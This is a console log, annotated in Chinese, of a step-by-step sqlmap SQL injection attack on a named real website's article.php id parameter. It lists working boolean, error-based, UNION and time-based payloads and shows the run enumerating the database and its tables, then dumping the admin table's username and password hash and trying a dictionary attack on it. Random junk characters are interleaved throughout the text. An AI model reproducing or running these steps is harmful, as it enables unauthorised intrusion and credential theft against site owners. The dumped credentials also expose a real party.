D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* H9 ~/ y- j/ w7 y7 o
ms "Mysql" --current-user /* 注解:获取当前用户名称4 Y9 L9 z! T" p" J0 L0 J2 ~6 ^: e6 q
sqlmap/0.9 - automatic SQL injection and database takeover tool( T3 b. v$ W) q; W5 \
http://sqlmap.sourceforge.net starting at: 16:53:54
% Z: C4 e! i5 @! G2 s[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( w. o1 F( c, E3 k$ ?) f# M+ z
session file
9 Y, R" X" L! l5 y p$ }% E[16:53:54] [INFO] resuming injection data from session file
7 M. b- [+ w, I* \7 u1 ][16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file6 a( i4 ~; o6 Q0 D* l
[16:53:54] [INFO] testing connection to the target url
* Z9 X' M% P2 V1 esqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ G. a5 c; o; p! A# Ksts:
1 v+ z7 R& w) o. @' S% L' y---
- w- q! {/ D8 Q; D oPlace: GET# j; F0 h: f* a" s1 O4 ~" K0 t9 U
Parameter: id- i, e* [ t7 L
Type: boolean-based blind6 b% o9 v5 o) h4 \
Title: AND boolean-based blind - WHERE or HAVING clause# b6 [# ]9 l: R* w8 B/ N& a
Payload: id=276 AND 799=799
$ a5 g; V& Q% M2 z; s1 q4 { Type: error-based0 C3 _5 f/ R* n6 B+ h E+ k! z) A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& A: M2 D- F0 S f' D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 p8 R, S) h/ P( A Q# `7 |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 p ]/ K: }: t* T- x),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, Q! x8 H- U* ~ Type: UNION query5 g9 ^7 Z( @$ d9 X m; p: c' X
Title: MySQL UNION query (NULL) - 1 to 10 columns' d) S$ _6 v6 P. L
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( A* U0 {" ]7 n; U, J4 Y; O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 h8 p+ Z7 Q2 L) ~
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
u" J7 d' V) A' z6 w Type: AND/OR time-based blind$ h' E# B2 S& l" @( |; c! N5 c
Title: MySQL > 5.0.11 AND time-based blind
7 s& ^5 e& I2 U Payload: id=276 AND SLEEP(5). r6 f2 s5 h' s$ y5 R: q: p6 Q
---
2 N4 B, q! p3 ?% a7 o, o[16:53:55] [INFO] the back-end DBMS is MySQL R% @0 M( v7 x" @ I5 _) y; `
web server operating system: Windows
" {8 G0 U3 W/ D, R. O% a- k4 Eweb application technology: Apache 2.2.11, PHP 5.3.0
; U" W: \ i- H# C$ v3 h! U7 Oback-end DBMS: MySQL 5.0/ s; B& A, A1 v$ Y' U# p
[16:53:55] [INFO] fetching current user
7 p4 d$ R$ O; M- j* I8 fcurrent user: 'root@localhost' % f2 P1 l& G: o0 `
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou, `" ?$ |8 @2 E2 D, k
tput\www.wepost.com.hk' shutting down at: 16:53:58
% y! m" h7 L" v
2 R: O: U( Z" U) gD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; [- j6 i6 T, \; xms "Mysql" --current-db /*当前数据库
; q. f# g1 u. |2 t. [; `. }* u' o sqlmap/0.9 - automatic SQL injection and database takeover tool
* Q+ F) v3 J& u) L$ a+ k0 V& R http://sqlmap.sourceforge.net starting at: 16:54:16
8 J0 v" j5 G: D$ n! }: A" g X[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
/ D+ [0 N% |$ A6 E, h2 R session file
2 F0 i7 w+ D: h# \0 M[16:54:16] [INFO] resuming injection data from session file* G* j b1 D' @ x5 G/ j
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; _/ i4 K8 T' a4 U$ ?6 m- x1 X
[16:54:16] [INFO] testing connection to the target url6 @# a, B. L+ O) i, B' `
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 Z; c4 m7 E* o8 `# D2 Psts:
9 F" s: k$ L$ T" k--- d! b" n; N& J P+ o
Place: GET
- }7 o2 |% Z" ?Parameter: id: q0 b, A$ L; [5 \. ~! z
Type: boolean-based blind
! w# G! B; e* i( m% U* f6 {8 J Title: AND boolean-based blind - WHERE or HAVING clause
8 ?" E- z) B. n% p. ]! I Payload: id=276 AND 799=799( ]: }! b1 n2 f- U( r9 e
Type: error-based
; b. G9 q5 g" b" o Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% r; W; y. `3 C1 W. _" b$ q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, ]: y9 B$ q3 G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 c% R; R* s7 o$ [: m) u, D9 V# l9 W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* M. [+ u+ l7 P0 m' z
Type: UNION query
6 `8 C4 N( C0 ?9 p9 E0 D8 | Title: MySQL UNION query (NULL) - 1 to 10 columns# B' ^( d$ F1 ^, x; f
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 O1 j6 g" l- x; r(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 h/ Z+ b! O9 p' c' o
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- d% Q. c0 c7 c Type: AND/OR time-based blind0 X7 R {( a# w: n6 I
Title: MySQL > 5.0.11 AND time-based blind1 I# \! z9 U8 I8 z! x8 a
Payload: id=276 AND SLEEP(5)# U; B1 e+ u, D# U
---
9 c! P& G; r: ]* u' N1 c, j[16:54:17] [INFO] the back-end DBMS is MySQL# ]& w* U, c5 _% m& Q' x0 r
web server operating system: Windows
8 L+ e7 E$ \ @web application technology: Apache 2.2.11, PHP 5.3.00 O& a1 V# }4 E' u, J/ Z1 h
back-end DBMS: MySQL 5.0
9 f5 n0 A6 V4 a9 \7 p8 ][16:54:17] [INFO] fetching current database
+ N/ b6 x) }' X- s9 l5 {. ^9 [. Ocurrent database: 'wepost'% P0 `% s" s, O' ^( x2 U6 {
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou: D4 b# U! E5 K2 z& O1 V! A
tput\www.wepost.com.hk' shutting down at: 16:54:18' D+ N3 h6 c* O
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; b: g4 B9 E& R
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
/ U7 T N' s; E- ?, Z$ c sqlmap/0.9 - automatic SQL injection and database takeover tool0 ]) f$ |& h+ V8 @5 q
http://sqlmap.sourceforge.net starting at: 16:55:25
9 `* M U% _$ t3 N3 X0 w4 O3 E) `[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
1 ^9 v @- T7 L3 @. o) Q Q: C5 e/ x session file
) g1 O+ w* C( w0 T) b[16:55:25] [INFO] resuming injection data from session file- A- S9 w. S4 s& S
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
6 E( v7 I) f) A5 P& y5 M8 k[16:55:25] [INFO] testing connection to the target url
; k1 S& M2 L7 f: `' L4 m$ Qsqlmap identified the following injection points with a total of 0 HTTP(s) reque7 y T/ }" t/ V( f
sts:" D1 q6 l; K$ N) w. d$ s+ z
---0 w5 v' j$ P5 U" N, ^1 {: O
Place: GET5 [/ h& q% h( P% T) w& `
Parameter: id
/ h3 |3 [) v( O: _/ J" C Type: boolean-based blind) G: b. t; F& Z8 w
Title: AND boolean-based blind - WHERE or HAVING clause
( e$ |# v# ?8 Z0 g# q+ e# } Payload: id=276 AND 799=799
7 D* g) B( R5 y$ @$ c7 z6 ? Type: error-based
; F( w5 z" g A, Y) }: ^+ ^) g% } Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 [/ F7 { v& S% s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 ]7 u: E! v7 f4 v7 |: a8 S! Q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 N. l% N! x* D' w( j6 g+ m
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 y% K5 u W& _2 g' E2 W2 {
Type: UNION query! H* `$ `2 P1 h9 u6 \9 b1 X; {
Title: MySQL UNION query (NULL) - 1 to 10 columns
9 ]3 N! n+ G" M* q7 Z8 y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) R T# o# D! f1 [1 C9 V% E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ K# J0 ]; f( R" W/ @) h
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 x( j2 v7 p& K. K) g
Type: AND/OR time-based blind& j X! C2 D) j& b# o! N# ~
Title: MySQL > 5.0.11 AND time-based blind
$ i6 R6 j$ ?# ] Payload: id=276 AND SLEEP(5)# N; N2 W* I Y# ~/ ?: _8 E: k, j
---1 Q9 ^5 X2 j3 P" {% }$ I
[16:55:26] [INFO] the back-end DBMS is MySQL
5 _/ i6 n/ n2 A- I; H' V' V- R0 gweb server operating system: Windows
1 W+ ^5 c' W/ V$ E, Nweb application technology: Apache 2.2.11, PHP 5.3.0( i. d3 |" `- q5 u- R% [" ?( r" V% M
back-end DBMS: MySQL 5.0
( ]: T) n; P& D. F[16:55:26] [INFO] fetching tables for database 'wepost'
$ N) M! I7 o1 n; I[16:55:27] [INFO] the SQL query used returns 6 entries% v! \4 Z- ]( M
Database: wepost8 P( ?, h" C* [6 g: Y, ?
[6 tables]' D8 n9 P& g( C, x8 U$ C2 H" \- q
+-------------+4 `! `- w5 F! D
| admin |
+ | Y% N% |( q5 ~. U4 ~' z| article |
- M% y3 y! h2 N0 c% l| contributor |8 c+ u7 n- M ^! q: S
| idea |
4 f5 c% T7 U0 |) ^/ `4 E. l0 I& U| image |/ U# V+ P' V- Q$ i4 |) q: J
| issue |: R1 ]. q/ v% T. G
+-------------+
: K+ i7 ]* v# }( J% D' d[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
) t& r( D/ i! W* j& {% u/ ~3 ]tput\www.wepost.com.hk' shutting down at: 16:55:33
' I4 |; j! }" _/ ?
+ K: O P7 E1 t* B1 zD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ h2 Q, g6 i2 Y( _" C0 `0 mms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
/ Z. U8 Y- s# \" r s1 D sqlmap/0.9 - automatic SQL injection and database takeover tool
4 K* U: q" w2 E3 X http://sqlmap.sourceforge.net starting at: 16:56:06
/ ^: e _" o& y* u+ Hsqlmap identified the following injection points with a total of 0 HTTP(s) reque
. o2 B+ @1 r5 b7 Bsts:
7 p- b4 b3 j! X7 L( Y---- w H# y; ?! ?% r
Place: GET
9 L% S" G5 \- s8 U$ g% x$ ]. NParameter: id6 h8 ^; ?$ r. p6 x' v
Type: boolean-based blind2 R+ J, [! T( Q
Title: AND boolean-based blind - WHERE or HAVING clause
( Z3 G. k- R) z1 _- F$ U Payload: id=276 AND 799=799+ _% b$ J6 b- N( Q9 n
Type: error-based
o8 h. f7 y7 E- b Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" I" L( v4 K Q- I5 k Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, d/ g9 L( S4 | P1 J! q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% G- R1 `' t, y; B. ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), V- j1 Z& ^- j* `
Type: UNION query9 b( r3 ?4 B4 H: b0 o( J: q
Title: MySQL UNION query (NULL) - 1 to 10 columns5 b" [+ S, F7 \% ~
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 a# o& o8 Z, k; F# \& V I
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
t# x7 W+ ?- X4 kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# G% _+ C4 E) `# T/ m3 ^8 e
Type: AND/OR time-based blind' ]% j- L7 m( r
Title: MySQL > 5.0.11 AND time-based blind* g9 ~5 o5 P+ J! [7 N
Payload: id=276 AND SLEEP(5)
' D0 U& J [; j6 n5 G---
2 \9 {( f( \( ~1 f# t( Hweb server operating system: Windows
* ]8 ^5 w- }( Hweb application technology: Apache 2.2.11, PHP 5.3.0+ p$ c4 |- c, [0 n7 }
back-end DBMS: MySQL 5.0
5 \1 n! }5 S' I" o' M9 J4 j[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se6 P# |" U+ L# M; U
ssion': wepost, wepost
! J/ A9 E+ X% H" o: ~5 s* d, G) yDatabase: wepost
% X- u3 i9 z, y2 s9 W9 pTable: admin% ^; e ^0 b5 ^2 \ ]( T7 J
[4 columns]
- w/ E$ P: @$ s; z2 L) _$ a+----------+-------------+7 E S# w* |5 j8 B
| Column | Type |+ i) j, A7 U/ l0 O
+----------+-------------+
' {6 X: s- M# W0 V. c( v| id | int(11) |9 I1 c. A& Z6 Q: v
| password | varchar(32) |$ |: g. Q3 L. W f5 t: @5 f
| type | varchar(10) |8 i2 l7 `3 X3 Q, n$ \+ j5 t
| userid | varchar(20) | f0 e7 v" ]' F% m& P+ ^2 H) s
+----------+-------------+9 N& g$ i4 @# K3 J1 C4 N, A5 A0 O
shutting down at: 16:56:19
" H( @7 t3 e9 C
4 v; d/ K* L" |9 b9 ND:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# r* r, M2 `, }3 s1 g
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
) |) ?; O9 E* k& ?: O sqlmap/0.9 - automatic SQL injection and database takeover tool; @$ H) `, ^2 Y* U0 m3 G B* J8 F
http://sqlmap.sourceforge.net starting at: 16:57:14
/ S7 ^5 b3 q g6 \! L, \: esqlmap identified the following injection points with a total of 0 HTTP(s) reque
4 ]1 B+ P& o9 c! Gsts:
5 @, y7 z3 I& F; S8 R& N+ Y---
* }, a ?) F% g J* _Place: GET
1 `/ q6 O% ]; R) c. b, t; A+ q& ZParameter: id5 h! ]; j5 R+ L& ]+ r0 e
Type: boolean-based blind8 s& }# K' j: G0 v
Title: AND boolean-based blind - WHERE or HAVING clause3 {% ]. U, {2 v9 l- f' v+ q
Payload: id=276 AND 799=799
" S, |3 G6 d Z Type: error-based' c, K+ c7 L5 `/ x
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 C T3 I, a9 p) o Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; `% C/ Z5 B7 n- Y. j
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
. P0 @2 H$ g! G),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% j$ Y$ X; s7 x x
Type: UNION query/ H$ q6 \# h3 y0 J6 p2 S- h
Title: MySQL UNION query (NULL) - 1 to 10 columns
2 [$ U2 D( R2 l/ O( v6 |$ K Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, _7 n, f4 I& M$ v0 Z: L9 _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 V) @1 ]" C2 |) \ s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) s1 E4 e; [: K9 D$ B0 D; n
Type: AND/OR time-based blind3 Q0 h1 t$ V% U5 N, L( J, g1 a
Title: MySQL > 5.0.11 AND time-based blind" Y/ x2 T+ ]" m
Payload: id=276 AND SLEEP(5)! V; {4 |# g k2 D
---0 X7 {4 N6 I/ W4 ^# K
web server operating system: Windows
y& ?# U: Z T$ d5 s3 b' xweb application technology: Apache 2.2.11, PHP 5.3.0# E4 o3 q$ {3 o7 v4 F
back-end DBMS: MySQL 5.0
7 t' [- c! h# e' B f# hrecognized possible password hash values. do you want to use dictionary attack o
; A: U# t, E: _4 l4 dn retrieved table items? [Y/n/q] y
/ l7 h+ M* Y0 A8 U9 v" R9 h4 Dwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]7 @& o0 T3 a( u
do you want to use common password suffixes? (slow!) [y/N] y
7 \" Y" }, t" v4 x, {! ZDatabase: wepost/ ^( \: }+ O0 _- c* D
Table: admin5 R! X! n7 n+ J& V
[1 entry]4 y$ k, z1 f9 r0 \* C& G& d
+----------------------------------+------------+
4 F# ?( `9 y; Z5 S0 C9 s| password | userid |! ? B6 }# K: u9 k+ e
+----------------------------------+------------+- ?/ B4 {2 G* v/ R( B6 ?' A
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |% D( r" S# _: z. `. z
+----------------------------------+------------+1 b/ E9 [) w7 a$ [
shutting down at: 16:58:14
! \$ T$ a3 J0 J' X
" z, E, {# I* T: q2 iD:\Python27\sqlmap> |